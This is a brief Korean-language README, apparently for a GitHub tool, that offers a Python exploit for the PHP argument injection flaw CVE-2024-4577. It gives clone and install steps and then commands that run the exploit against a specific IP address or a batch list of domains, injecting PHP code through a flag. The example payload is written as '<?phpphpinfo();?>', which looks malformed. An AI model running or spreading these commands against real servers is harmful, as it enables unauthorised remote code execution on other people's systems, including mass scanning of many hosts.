
CVE-2024-4577 PHP 인자 주입 취약점을 위한 Python 기반 익스플로잇으로, 단일 대상 및 배치 스캔 기능을 지원합니다.
PHP 인수 삽입 취약점
git clone https://github.com/gotr00t0day/CVE-2024-4577.git
cd CVE-2024-4577
pip3 install -r requirements.txt
# Scan A Target
python3 CVE-2024-4577.py -t https://160.153.61.66/ -c "<?phpphpinfo();?>"
# Scan a list of Targets
python3 CVE-2024-4577.py -f domains.txt -c "<?phpphpinfo();?>"